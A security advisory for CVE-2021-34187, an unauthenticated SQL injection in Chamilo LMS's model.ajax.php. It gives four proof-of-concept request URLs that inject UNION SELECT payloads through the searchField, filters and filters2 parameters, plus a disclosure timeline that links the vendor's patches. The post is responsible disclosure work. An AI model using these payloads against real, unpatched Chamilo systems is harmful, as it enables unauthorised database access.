<h1>CVE-2021-34187. Unauthenticated SQL injection in Chamilo LMS 1.11.x and (dev version of) 2.0</h1>

<p>Published 2021-06-20 (last modified 2021-06-30) at <a href="https://murat.one/?p=118">https://murat.one/?p=118</a>.</p>

<p><strong>Product:</strong> Chamilo LMS 1.11.x, 2.x</p>

<p><strong>Vulnerability:</strong> SQL injection</p>

<p><strong>Author:</strong> Kutlymurat Mambetniyazov (@manfromkz)</p>

<p><strong>Acknowledgements:</strong> NitroTeam.kz</p>

<p><strong>Date:</strong> 05/25/2021</p>

<p><strong>Description:</strong> Lack of sanitization of the GET parameters searchField, filters and filters2 in /main/inc/ajax/model.ajax.php leads to multiple unauthenticated SQL injections.</p>

<p><strong>Tested on:</strong> Windows 10 x64, Apache 2.4, MariaDB 10.3.22, PHP 7.4, Chamilo LMS 1.11.x and 2.x.</p>

<p><strong>PoC:</strong></p>

<p><strong>Version 1.11.x, parameter &#8211; searchField</strong></p>

<pre class="wp-block-code"><code>http://chamilo1.11.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0</code></pre>

<figure class="wp-block-image"><img src="https://murat.one/wp-content/uploads/2021/06/1.1_searchField.png" alt=""></figure>

<p><strong>Version 2.x, parameter &#8211; searchField</strong></p>

<pre class="wp-block-code"><code>http://chamilo2.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0</code></pre>

<figure class="wp-block-image"><img src="https://murat.one/wp-content/uploads/2021/06/2_searchField.png" alt=""></figure>

<p><strong>Parameters: filters, filters2</strong></p>

<pre class="wp-block-code"><code>http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_force_search=1&amp;search=1&amp;searchField=1&amp;searchOper=ni&amp;searchString=testx&amp;filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&amp;from_course_session=0</code></pre>

<pre class="wp-block-code"><code>http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_force_search=1&amp;search=1&amp;searchField=1&amp;searchOper=ni&amp;searchString=testx&amp;filters2={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&amp;from_course_session=0</code></pre>

<p><strong>Timeline of the vulnerability:</strong></p>

<p>05/25/2021 &#8211; vulnerability discovered<br>05/27/2021 &#8211; notification to vendor<br>05/28/2021 &#8211; confirmation by vendor and patch release (version 1.11.x &#8211; <a href="https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571">https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571</a> and version 2.x &#8211; <a href="https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59">https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59</a>)<br>06/01/2021 &#8211; published on the vendor's issue tracker (<a href="https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection">https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection</a>)<br>06/20/2021 &#8211; published<br>06/28/2021 &#8211; CVE-2021-34187 assigned by MITRE</p>